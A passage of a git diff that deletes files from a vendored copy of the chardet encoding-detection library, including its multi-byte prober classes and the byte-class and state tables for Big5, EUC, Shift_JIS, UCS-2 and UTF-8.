of latin1 so that other more accurate detector - # can take priority. - confidence = confidence * 0.5 - return confidence diff --git a/chardet/chardet/latin1prober.pyc b/chardet/chardet/latin1prober.pyc deleted file mode 100644 index 76b7e4f..0000000 Binary files a/chardet/chardet/latin1prober.pyc and /dev/null differ diff --git a/chardet/chardet/mbcharsetprober.py b/chardet/chardet/mbcharsetprober.py deleted file mode 100644 index ab9abcb..0000000 --- a/chardet/chardet/mbcharsetprober.py +++ /dev/null @@ -1,83 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Universal charset detector code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 2001 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# Shy Shalom - original C code -# Proofpoint, Inc. -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from . import constants -import sys -from .constants import eStart, eError, eItsMe -from .charsetprober import CharSetProber - -class MultiByteCharSetProber(CharSetProber): - def __init__(self): - CharSetProber.__init__(self) - self._mDistributionAnalyzer = None - self._mCodingSM = None - self._mLastChar = [0, 0] - - def reset(self): - CharSetProber.reset(self) - if self._mCodingSM: - self._mCodingSM.reset() - if self._mDistributionAnalyzer: - self._mDistributionAnalyzer.reset() - self._mLastChar = [0, 0] - - def get_charset_name(self): - pass - - def feed(self, aBuf): - aLen = len(aBuf) - for i in range(0, aLen): - codingState = self._mCodingSM.next_state(aBuf[i]) - if codingState == eError: - if constants._debug: - sys.stderr.write(self.get_charset_name() + ' prober hit error at byte ' + str(i) + '\n') - self._mState = constants.eNotMe - break - elif codingState == eItsMe: - self._mState = constants.eFoundIt - break - elif codingState == eStart: - charLen = self._mCodingSM.get_current_charlen() - if i == 0: - self._mLastChar[1] = aBuf[0] - self._mDistributionAnalyzer.feed(self._mLastChar, charLen) - else: - self._mDistributionAnalyzer.feed(aBuf[i-1:i+1], charLen) - - self._mLastChar[0] = aBuf[aLen - 1] - - if self.get_state() == constants.eDetecting: - if self._mDistributionAnalyzer.got_enough_data() and \ - (self.get_confidence() > constants.SHORTCUT_THRESHOLD): - self._mState = constants.eFoundIt - - return self.get_state() - - def get_confidence(self): - return self._mDistributionAnalyzer.get_confidence() diff --git a/chardet/chardet/mbcharsetprober.py.bak b/chardet/chardet/mbcharsetprober.py.bak deleted file mode 100644 index a813144..0000000 --- a/chardet/chardet/mbcharsetprober.py.bak +++ /dev/null @@ -1,82 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Universal charset detector code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 2001 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# Shy Shalom - original C code -# Proofpoint, Inc. -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -import constants, sys -from constants import eStart, eError, eItsMe -from charsetprober import CharSetProber - -class MultiByteCharSetProber(CharSetProber): - def __init__(self): - CharSetProber.__init__(self) - self._mDistributionAnalyzer = None - self._mCodingSM = None - self._mLastChar = ['\x00', '\x00'] - - def reset(self): - CharSetProber.reset(self) - if self._mCodingSM: - self._mCodingSM.reset() - if self._mDistributionAnalyzer: - self._mDistributionAnalyzer.reset() - self._mLastChar = ['\x00', '\x00'] - - def get_charset_name(self): - pass - - def feed(self, aBuf): - aLen = len(aBuf) - for i in range(0, aLen): - codingState = self._mCodingSM.next_state(aBuf[i]) - if codingState == eError: - if constants._debug: - sys.stderr.write(self.get_charset_name() + ' prober hit error at byte ' + str(i) + '\n') - self._mState = constants.eNotMe - break - elif codingState == eItsMe: - self._mState = constants.eFoundIt - break - elif codingState == eStart: - charLen = self._mCodingSM.get_current_charlen() - if i == 0: - self._mLastChar[1] = aBuf[0] - self._mDistributionAnalyzer.feed(self._mLastChar, charLen) - else: - self._mDistributionAnalyzer.feed(aBuf[i-1:i+1], charLen) - - self._mLastChar[0] = aBuf[aLen - 1] - - if self.get_state() == constants.eDetecting: - if self._mDistributionAnalyzer.got_enough_data() and \ - (self.get_confidence() > constants.SHORTCUT_THRESHOLD): - self._mState = constants.eFoundIt - - return self.get_state() - - def get_confidence(self): - return self._mDistributionAnalyzer.get_confidence() diff --git a/chardet/chardet/mbcharsetprober.pyc b/chardet/chardet/mbcharsetprober.pyc deleted file mode 100644 index ba52fba..0000000 Binary files a/chardet/chardet/mbcharsetprober.pyc and /dev/null differ diff --git a/chardet/chardet/mbcsgroupprober.py b/chardet/chardet/mbcsgroupprober.py deleted file mode 100644 index 6c6b048..0000000 --- a/chardet/chardet/mbcsgroupprober.py +++ /dev/null @@ -1,50 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Universal charset detector code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 2001 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# Shy Shalom - original C code -# Proofpoint, Inc. -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from .charsetgroupprober import CharSetGroupProber -from .utf8prober import UTF8Prober -from .sjisprober import SJISProber -from .eucjpprober import EUCJPProber -from .gb2312prober import GB2312Prober -from .euckrprober import EUCKRProber -from .big5prober import Big5Prober -from .euctwprober import EUCTWProber - -class MBCSGroupProber(CharSetGroupProber): - def __init__(self): - CharSetGroupProber.__init__(self) - self._mProbers = [ \ - UTF8Prober(), - SJISProber(), - EUCJPProber(), - GB2312Prober(), - EUCKRProber(), - Big5Prober(), - EUCTWProber()] - self.reset() diff --git a/chardet/chardet/mbcsgroupprober.py.bak b/chardet/chardet/mbcsgroupprober.py.bak deleted file mode 100644 index 941cc3e..0000000 --- a/chardet/chardet/mbcsgroupprober.py.bak +++ /dev/null @@ -1,50 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Universal charset detector code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 2001 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# Shy Shalom - original C code -# Proofpoint, Inc. -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from charsetgroupprober import CharSetGroupProber -from utf8prober import UTF8Prober -from sjisprober import SJISProber -from eucjpprober import EUCJPProber -from gb2312prober import GB2312Prober -from euckrprober import EUCKRProber -from big5prober import Big5Prober -from euctwprober import EUCTWProber - -class MBCSGroupProber(CharSetGroupProber): - def __init__(self): - CharSetGroupProber.__init__(self) - self._mProbers = [ \ - UTF8Prober(), - SJISProber(), - EUCJPProber(), - GB2312Prober(), - EUCKRProber(), - Big5Prober(), - EUCTWProber()] - self.reset() diff --git a/chardet/chardet/mbcsgroupprober.pyc b/chardet/chardet/mbcsgroupprober.pyc deleted file mode 100644 index 5f03d2c..0000000 Binary files a/chardet/chardet/mbcsgroupprober.pyc and /dev/null differ diff --git a/chardet/chardet/mbcssm.py b/chardet/chardet/mbcssm.py deleted file mode 100644 index 4f2922d..0000000 --- a/chardet/chardet/mbcssm.py +++ /dev/null @@ -1,514 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is mozilla.org code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from .constants import eStart, eError, eItsMe - -# BIG5 - -BIG5_cls = ( \ - 1,1,1,1,1,1,1,1, # 00 - 07 #allow 0x00 as legal value - 1,1,1,1,1,1,0,0, # 08 - 0f - 1,1,1,1,1,1,1,1, # 10 - 17 - 1,1,1,0,1,1,1,1, # 18 - 1f - 1,1,1,1,1,1,1,1, # 20 - 27 - 1,1,1,1,1,1,1,1, # 28 - 2f - 1,1,1,1,1,1,1,1, # 30 - 37 - 1,1,1,1,1,1,1,1, # 38 - 3f - 2,2,2,2,2,2,2,2, # 40 - 47 - 2,2,2,2,2,2,2,2, # 48 - 4f - 2,2,2,2,2,2,2,2, # 50 - 57 - 2,2,2,2,2,2,2,2, # 58 - 5f - 2,2,2,2,2,2,2,2, # 60 - 67 - 2,2,2,2,2,2,2,2, # 68 - 6f - 2,2,2,2,2,2,2,2, # 70 - 77 - 2,2,2,2,2,2,2,1, # 78 - 7f - 4,4,4,4,4,4,4,4, # 80 - 87 - 4,4,4,4,4,4,4,4, # 88 - 8f - 4,4,4,4,4,4,4,4, # 90 - 97 - 4,4,4,4,4,4,4,4, # 98 - 9f - 4,3,3,3,3,3,3,3, # a0 - a7 - 3,3,3,3,3,3,3,3, # a8 - af - 3,3,3,3,3,3,3,3, # b0 - b7 - 3,3,3,3,3,3,3,3, # b8 - bf - 3,3,3,3,3,3,3,3, # c0 - c7 - 3,3,3,3,3,3,3,3, # c8 - cf - 3,3,3,3,3,3,3,3, # d0 - d7 - 3,3,3,3,3,3,3,3, # d8 - df - 3,3,3,3,3,3,3,3, # e0 - e7 - 3,3,3,3,3,3,3,3, # e8 - ef - 3,3,3,3,3,3,3,3, # f0 - f7 - 3,3,3,3,3,3,3,0) # f8 - ff - -BIG5_st = ( \ - eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07 - eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,#08-0f - eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart)#10-17 - -Big5CharLenTable = (0, 1, 1, 2, 0) - -Big5SMModel = {'classTable': BIG5_cls, - 'classFactor': 5, - 'stateTable': BIG5_st, - 'charLenTable': Big5CharLenTable, - 'name': 'Big5'} - -# EUC-JP - -EUCJP_cls = ( \ - 4,4,4,4,4,4,4,4, # 00 - 07 - 4,4,4,4,4,4,5,5, # 08 - 0f - 4,4,4,4,4,4,4,4, # 10 - 17 - 4,4,4,5,4,4,4,4, # 18 - 1f - 4,4,4,4,4,4,4,4, # 20 - 27 - 4,4,4,4,4,4,4,4, # 28 - 2f - 4,4,4,4,4,4,4,4, # 30 - 37 - 4,4,4,4,4,4,4,4, # 38 - 3f - 4,4,4,4,4,4,4,4, # 40 - 47 - 4,4,4,4,4,4,4,4, # 48 - 4f - 4,4,4,4,4,4,4,4, # 50 - 57 - 4,4,4,4,4,4,4,4, # 58 - 5f - 4,4,4,4,4,4,4,4, # 60 - 67 - 4,4,4,4,4,4,4,4, # 68 - 6f - 4,4,4,4,4,4,4,4, # 70 - 77 - 4,4,4,4,4,4,4,4, # 78 - 7f - 5,5,5,5,5,5,5,5, # 80 - 87 - 5,5,5,5,5,5,1,3, # 88 - 8f - 5,5,5,5,5,5,5,5, # 90 - 97 - 5,5,5,5,5,5,5,5, # 98 - 9f - 5,2,2,2,2,2,2,2, # a0 - a7 - 2,2,2,2,2,2,2,2, # a8 - af - 2,2,2,2,2,2,2,2, # b0 - b7 - 2,2,2,2,2,2,2,2, # b8 - bf - 2,2,2,2,2,2,2,2, # c0 - c7 - 2,2,2,2,2,2,2,2, # c8 - cf - 2,2,2,2,2,2,2,2, # d0 - d7 - 2,2,2,2,2,2,2,2, # d8 - df - 0,0,0,0,0,0,0,0, # e0 - e7 - 0,0,0,0,0,0,0,0, # e8 - ef - 0,0,0,0,0,0,0,0, # f0 - f7 - 0,0,0,0,0,0,0,5) # f8 - ff - -EUCJP_st = ( \ - 3, 4, 3, 5,eStart,eError,eError,eError,#00-07 - eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe,eStart,eError,eStart,eError,eError,eError,#10-17 - eError,eError,eStart,eError,eError,eError, 3,eError,#18-1f - 3,eError,eError,eError,eStart,eStart,eStart,eStart)#20-27 - -EUCJPCharLenTable = (2, 2, 2, 3, 1, 0) - -EUCJPSMModel = {'classTable': EUCJP_cls, - 'classFactor': 6, - 'stateTable': EUCJP_st, - 'charLenTable': EUCJPCharLenTable, - 'name': 'EUC-JP'} - -# EUC-KR - -EUCKR_cls = ( \ - 1,1,1,1,1,1,1,1, # 00 - 07 - 1,1,1,1,1,1,0,0, # 08 - 0f - 1,1,1,1,1,1,1,1, # 10 - 17 - 1,1,1,0,1,1,1,1, # 18 - 1f - 1,1,1,1,1,1,1,1, # 20 - 27 - 1,1,1,1,1,1,1,1, # 28 - 2f - 1,1,1,1,1,1,1,1, # 30 - 37 - 1,1,1,1,1,1,1,1, # 38 - 3f - 1,1,1,1,1,1,1,1, # 40 - 47 - 1,1,1,1,1,1,1,1, # 48 - 4f - 1,1,1,1,1,1,1,1, # 50 - 57 - 1,1,1,1,1,1,1,1, # 58 - 5f - 1,1,1,1,1,1,1,1, # 60 - 67 - 1,1,1,1,1,1,1,1, # 68 - 6f - 1,1,1,1,1,1,1,1, # 70 - 77 - 1,1,1,1,1,1,1,1, # 78 - 7f - 0,0,0,0,0,0,0,0, # 80 - 87 - 0,0,0,0,0,0,0,0, # 88 - 8f - 0,0,0,0,0,0,0,0, # 90 - 97 - 0,0,0,0,0,0,0,0, # 98 - 9f - 0,2,2,2,2,2,2,2, # a0 - a7 - 2,2,2,2,2,3,3,3, # a8 - af - 2,2,2,2,2,2,2,2, # b0 - b7 - 2,2,2,2,2,2,2,2, # b8 - bf - 2,2,2,2,2,2,2,2, # c0 - c7 - 2,3,2,2,2,2,2,2, # c8 - cf - 2,2,2,2,2,2,2,2, # d0 - d7 - 2,2,2,2,2,2,2,2, # d8 - df - 2,2,2,2,2,2,2,2, # e0 - e7 - 2,2,2,2,2,2,2,2, # e8 - ef - 2,2,2,2,2,2,2,2, # f0 - f7 - 2,2,2,2,2,2,2,0) # f8 - ff - -EUCKR_st = ( - eError,eStart, 3,eError,eError,eError,eError,eError,#00-07 - eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,eStart)#08-0f - -EUCKRCharLenTable = (0, 1, 2, 0) - -EUCKRSMModel = {'classTable': EUCKR_cls, - 'classFactor': 4, - 'stateTable': EUCKR_st, - 'charLenTable': EUCKRCharLenTable, - 'name': 'EUC-KR'} - -# EUC-TW - -EUCTW_cls = ( \ - 2,2,2,2,2,2,2,2, # 00 - 07 - 2,2,2,2,2,2,0,0, # 08 - 0f - 2,2,2,2,2,2,2,2, # 10 - 17 - 2,2,2,0,2,2,2,2, # 18 - 1f - 2,2,2,2,2,2,2,2, # 20 - 27 - 2,2,2,2,2,2,2,2, # 28 - 2f - 2,2,2,2,2,2,2,2, # 30 - 37 - 2,2,2,2,2,2,2,2, # 38 - 3f - 2,2,2,2,2,2,2,2, # 40 - 47 - 2,2,2,2,2,2,2,2, # 48 - 4f - 2,2,2,2,2,2,2,2, # 50 - 57 - 2,2,2,2,2,2,2,2, # 58 - 5f - 2,2,2,2,2,2,2,2, # 60 - 67 - 2,2,2,2,2,2,2,2, # 68 - 6f - 2,2,2,2,2,2,2,2, # 70 - 77 - 2,2,2,2,2,2,2,2, # 78 - 7f - 0,0,0,0,0,0,0,0, # 80 - 87 - 0,0,0,0,0,0,6,0, # 88 - 8f - 0,0,0,0,0,0,0,0, # 90 - 97 - 0,0,0,0,0,0,0,0, # 98 - 9f - 0,3,4,4,4,4,4,4, # a0 - a7 - 5,5,1,1,1,1,1,1, # a8 - af - 1,1,1,1,1,1,1,1, # b0 - b7 - 1,1,1,1,1,1,1,1, # b8 - bf - 1,1,3,1,3,3,3,3, # c0 - c7 - 3,3,3,3,3,3,3,3, # c8 - cf - 3,3,3,3,3,3,3,3, # d0 - d7 - 3,3,3,3,3,3,3,3, # d8 - df - 3,3,3,3,3,3,3,3, # e0 - e7 - 3,3,3,3,3,3,3,3, # e8 - ef - 3,3,3,3,3,3,3,3, # f0 - f7 - 3,3,3,3,3,3,3,0) # f8 - ff - -EUCTW_st = ( \ - eError,eError,eStart, 3, 3, 3, 4,eError,#00-07 - eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eStart,eError,#10-17 - eStart,eStart,eStart,eError,eError,eError,eError,eError,#18-1f - 5,eError,eError,eError,eStart,eError,eStart,eStart,#20-27 - eStart,eError,eStart,eStart,eStart,eStart,eStart,eStart)#28-2f - -EUCTWCharLenTable = (0, 0, 1, 2, 2, 2, 3) - -EUCTWSMModel = {'classTable': EUCTW_cls, - 'classFactor': 7, - 'stateTable': EUCTW_st, - 'charLenTable': EUCTWCharLenTable, - 'name': 'x-euc-tw'} - -# GB2312 - -GB2312_cls = ( \ - 1,1,1,1,1,1,1,1, # 00 - 07 - 1,1,1,1,1,1,0,0, # 08 - 0f - 1,1,1,1,1,1,1,1, # 10 - 17 - 1,1,1,0,1,1,1,1, # 18 - 1f - 1,1,1,1,1,1,1,1, # 20 - 27 - 1,1,1,1,1,1,1,1, # 28 - 2f - 3,3,3,3,3,3,3,3, # 30 - 37 - 3,3,1,1,1,1,1,1, # 38 - 3f - 2,2,2,2,2,2,2,2, # 40 - 47 - 2,2,2,2,2,2,2,2, # 48 - 4f - 2,2,2,2,2,2,2,2, # 50 - 57 - 2,2,2,2,2,2,2,2, # 58 - 5f - 2,2,2,2,2,2,2,2, # 60 - 67 - 2,2,2,2,2,2,2,2, # 68 - 6f - 2,2,2,2,2,2,2,2, # 70 - 77 - 2,2,2,2,2,2,2,4, # 78 - 7f - 5,6,6,6,6,6,6,6, # 80 - 87 - 6,6,6,6,6,6,6,6, # 88 - 8f - 6,6,6,6,6,6,6,6, # 90 - 97 - 6,6,6,6,6,6,6,6, # 98 - 9f - 6,6,6,6,6,6,6,6, # a0 - a7 - 6,6,6,6,6,6,6,6, # a8 - af - 6,6,6,6,6,6,6,6, # b0 - b7 - 6,6,6,6,6,6,6,6, # b8 - bf - 6,6,6,6,6,6,6,6, # c0 - c7 - 6,6,6,6,6,6,6,6, # c8 - cf - 6,6,6,6,6,6,6,6, # d0 - d7 - 6,6,6,6,6,6,6,6, # d8 - df - 6,6,6,6,6,6,6,6, # e0 - e7 - 6,6,6,6,6,6,6,6, # e8 - ef - 6,6,6,6,6,6,6,6, # f0 - f7 - 6,6,6,6,6,6,6,0) # f8 - ff - -GB2312_st = ( \ - eError,eStart,eStart,eStart,eStart,eStart, 3,eError,#00-07 - eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,#10-17 - 4,eError,eStart,eStart,eError,eError,eError,eError,#18-1f - eError,eError, 5,eError,eError,eError,eItsMe,eError,#20-27 - eError,eError,eStart,eStart,eStart,eStart,eStart,eStart)#28-2f - -# To be accurate, the length of class 6 can be either 2 or 4. -# But it is not necessary to discriminate between the two since -# it is used for frequency analysis only, and we are validing -# each code range there as well. So it is safe to set it to be -# 2 here. -GB2312CharLenTable = (0, 1, 1, 1, 1, 1, 2) - -GB2312SMModel = {'classTable': GB2312_cls, - 'classFactor': 7, - 'stateTable': GB2312_st, - 'charLenTable': GB2312CharLenTable, - 'name': 'GB2312'} - -# Shift_JIS - -SJIS_cls = ( \ - 1,1,1,1,1,1,1,1, # 00 - 07 - 1,1,1,1,1,1,0,0, # 08 - 0f - 1,1,1,1,1,1,1,1, # 10 - 17 - 1,1,1,0,1,1,1,1, # 18 - 1f - 1,1,1,1,1,1,1,1, # 20 - 27 - 1,1,1,1,1,1,1,1, # 28 - 2f - 1,1,1,1,1,1,1,1, # 30 - 37 - 1,1,1,1,1,1,1,1, # 38 - 3f - 2,2,2,2,2,2,2,2, # 40 - 47 - 2,2,2,2,2,2,2,2, # 48 - 4f - 2,2,2,2,2,2,2,2, # 50 - 57 - 2,2,2,2,2,2,2,2, # 58 - 5f - 2,2,2,2,2,2,2,2, # 60 - 67 - 2,2,2,2,2,2,2,2, # 68 - 6f - 2,2,2,2,2,2,2,2, # 70 - 77 - 2,2,2,2,2,2,2,1, # 78 - 7f - 3,3,3,3,3,3,3,3, # 80 - 87 - 3,3,3,3,3,3,3,3, # 88 - 8f - 3,3,3,3,3,3,3,3, # 90 - 97 - 3,3,3,3,3,3,3,3, # 98 - 9f - #0xa0 is illegal in sjis encoding, but some pages does - #contain such byte. We need to be more error forgiven. - 2,2,2,2,2,2,2,2, # a0 - a7 - 2,2,2,2,2,2,2,2, # a8 - af - 2,2,2,2,2,2,2,2, # b0 - b7 - 2,2,2,2,2,2,2,2, # b8 - bf - 2,2,2,2,2,2,2,2, # c0 - c7 - 2,2,2,2,2,2,2,2, # c8 - cf - 2,2,2,2,2,2,2,2, # d0 - d7 - 2,2,2,2,2,2,2,2, # d8 - df - 3,3,3,3,3,3,3,3, # e0 - e7 - 3,3,3,3,3,4,4,4, # e8 - ef - 4,4,4,4,4,4,4,4, # f0 - f7 - 4,4,4,4,4,0,0,0) # f8 - ff - -SJIS_st = ( \ - eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07 - eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe,eError,eError,eStart,eStart,eStart,eStart)#10-17 - -SJISCharLenTable = (0, 1, 1, 2, 0, 0) - -SJISSMModel = {'classTable': SJIS_cls, - 'classFactor': 6, - 'stateTable': SJIS_st, - 'charLenTable': SJISCharLenTable, - 'name': 'Shift_JIS'} - -# UCS2-BE - -UCS2BE_cls = ( \ - 0,0,0,0,0,0,0,0, # 00 - 07 - 0,0,1,0,0,2,0,0, # 08 - 0f - 0,0,0,0,0,0,0,0, # 10 - 17 - 0,0,0,3,0,0,0,0, # 18 - 1f - 0,0,0,0,0,0,0,0, # 20 - 27 - 0,3,3,3,3,3,0,0, # 28 - 2f - 0,0,0,0,0,0,0,0, # 30 - 37 - 0,0,0,0,0,0,0,0, # 38 - 3f - 0,0,0,0,0,0,0,0, # 40 - 47 - 0,0,0,0,0,0,0,0, # 48 - 4f - 0,0,0,0,0,0,0,0, # 50 - 57 - 0,0,0,0,0,0,0,0, # 58 - 5f - 0,0,0,0,0,0,0,0, # 60 - 67 - 0,0,0,0,0,0,0,0, # 68 - 6f - 0,0,0,0,0,0,0,0, # 70 - 77 - 0,0,0,0,0,0,0,0, # 78 - 7f - 0,0,0,0,0,0,0,0, # 80 - 87 - 0,0,0,0,0,0,0,0, # 88 - 8f - 0,0,0,0,0,0,0,0, # 90 - 97 - 0,0,0,0,0,0,0,0, # 98 - 9f - 0,0,0,0,0,0,0,0, # a0 - a7 - 0,0,0,0,0,0,0,0, # a8 - af - 0,0,0,0,0,0,0,0, # b0 - b7 - 0,0,0,0,0,0,0,0, # b8 - bf - 0,0,0,0,0,0,0,0, # c0 - c7 - 0,0,0,0,0,0,0,0, # c8 - cf - 0,0,0,0,0,0,0,0, # d0 - d7 - 0,0,0,0,0,0,0,0, # d8 - df - 0,0,0,0,0,0,0,0, # e0 - e7 - 0,0,0,0,0,0,0,0, # e8 - ef - 0,0,0,0,0,0,0,0, # f0 - f7 - 0,0,0,0,0,0,4,5) # f8 - ff - -UCS2BE_st = ( \ - 5, 7, 7,eError, 4, 3,eError,eError,#00-07 - eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe, 6, 6, 6, 6,eError,eError,#10-17 - 6, 6, 6, 6, 6,eItsMe, 6, 6,#18-1f - 6, 6, 6, 6, 5, 7, 7,eError,#20-27 - 5, 8, 6, 6,eError, 6, 6, 6,#28-2f - 6, 6, 6, 6,eError,eError,eStart,eStart)#30-37 - -UCS2BECharLenTable = (2, 2, 2, 0, 2, 2) - -UCS2BESMModel = {'classTable': UCS2BE_cls, - 'classFactor': 6, - 'stateTable': UCS2BE_st, - 'charLenTable': UCS2BECharLenTable, - 'name': 'UTF-16BE'} - -# UCS2-LE - -UCS2LE_cls = ( \ - 0,0,0,0,0,0,0,0, # 00 - 07 - 0,0,1,0,0,2,0,0, # 08 - 0f - 0,0,0,0,0,0,0,0, # 10 - 17 - 0,0,0,3,0,0,0,0, # 18 - 1f - 0,0,0,0,0,0,0,0, # 20 - 27 - 0,3,3,3,3,3,0,0, # 28 - 2f - 0,0,0,0,0,0,0,0, # 30 - 37 - 0,0,0,0,0,0,0,0, # 38 - 3f - 0,0,0,0,0,0,0,0, # 40 - 47 - 0,0,0,0,0,0,0,0, # 48 - 4f - 0,0,0,0,0,0,0,0, # 50 - 57 - 0,0,0,0,0,0,0,0, # 58 - 5f - 0,0,0,0,0,0,0,0, # 60 - 67 - 0,0,0,0,0,0,0,0, # 68 - 6f - 0,0,0,0,0,0,0,0, # 70 - 77 - 0,0,0,0,0,0,0,0, # 78 - 7f - 0,0,0,0,0,0,0,0, # 80 - 87 - 0,0,0,0,0,0,0,0, # 88 - 8f - 0,0,0,0,0,0,0,0, # 90 - 97 - 0,0,0,0,0,0,0,0, # 98 - 9f - 0,0,0,0,0,0,0,0, # a0 - a7 - 0,0,0,0,0,0,0,0, # a8 - af - 0,0,0,0,0,0,0,0, # b0 - b7 - 0,0,0,0,0,0,0,0, # b8 - bf - 0,0,0,0,0,0,0,0, # c0 - c7 - 0,0,0,0,0,0,0,0, # c8 - cf - 0,0,0,0,0,0,0,0, # d0 - d7 - 0,0,0,0,0,0,0,0, # d8 - df - 0,0,0,0,0,0,0,0, # e0 - e7 - 0,0,0,0,0,0,0,0, # e8 - ef - 0,0,0,0,0,0,0,0, # f0 - f7 - 0,0,0,0,0,0,4,5) # f8 - ff - -UCS2LE_st = ( \ - 6, 6, 7, 6, 4, 3,eError,eError,#00-07 - eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe, 5, 5, 5,eError,eItsMe,eError,#10-17 - 5, 5, 5,eError, 5,eError, 6, 6,#18-1f - 7, 6, 8, 8, 5, 5, 5,eError,#20-27 - 5, 5, 5,eError,eError,eError, 5, 5,#28-2f - 5, 5, 5,eError, 5,eError,eStart,eStart)#30-37 - -UCS2LECharLenTable = (2, 2, 2, 2, 2, 2) - -UCS2LESMModel = {'classTable': UCS2LE_cls, - 'classFactor': 6, - 'stateTable': UCS2LE_st, - 'charLenTable': UCS2LECharLenTable, - 'name': 'UTF-16LE'} - -# UTF-8 - -UTF8_cls = ( \ - 1,1,1,1,1,1,1,1, # 00 - 07 #allow 0x00 as a legal value - 1,1,1,1,1,1,0,0, # 08 - 0f - 1,1,1,1,1,1,1,1, # 10 - 17 - 1,1,1,0,1,1,1,1, # 18 - 1f - 1,1,1,1,1,1,1,1, # 20 - 27 - 1,1,1,1,1,1,1,1, # 28 - 2f - 1,1,1,1,1,1,1,1, # 30 - 37 - 1,1,1,1,1,1,1,1, # 38 - 3f - 1,1,1,1,1,1,1,1, # 40 - 47 - 1,1,1,1,1,1,1,1, # 48 - 4f - 1,1,1,1,1,1,1,1, # 50 - 57 - 1,1,1,1,1,1,1,1, # 58 - 5f - 1,1,1,1,1,1,1,1, # 60 - 67 - 1,1,1,1,1,1,1,1, # 68 - 6f - 1,1,1,1,1,1,1,1, # 70 - 77 - 1,1,1,1,1,1,1,1, # 78 - 7f - 2,2,2,2,3,3,3,3, # 80 - 87 - 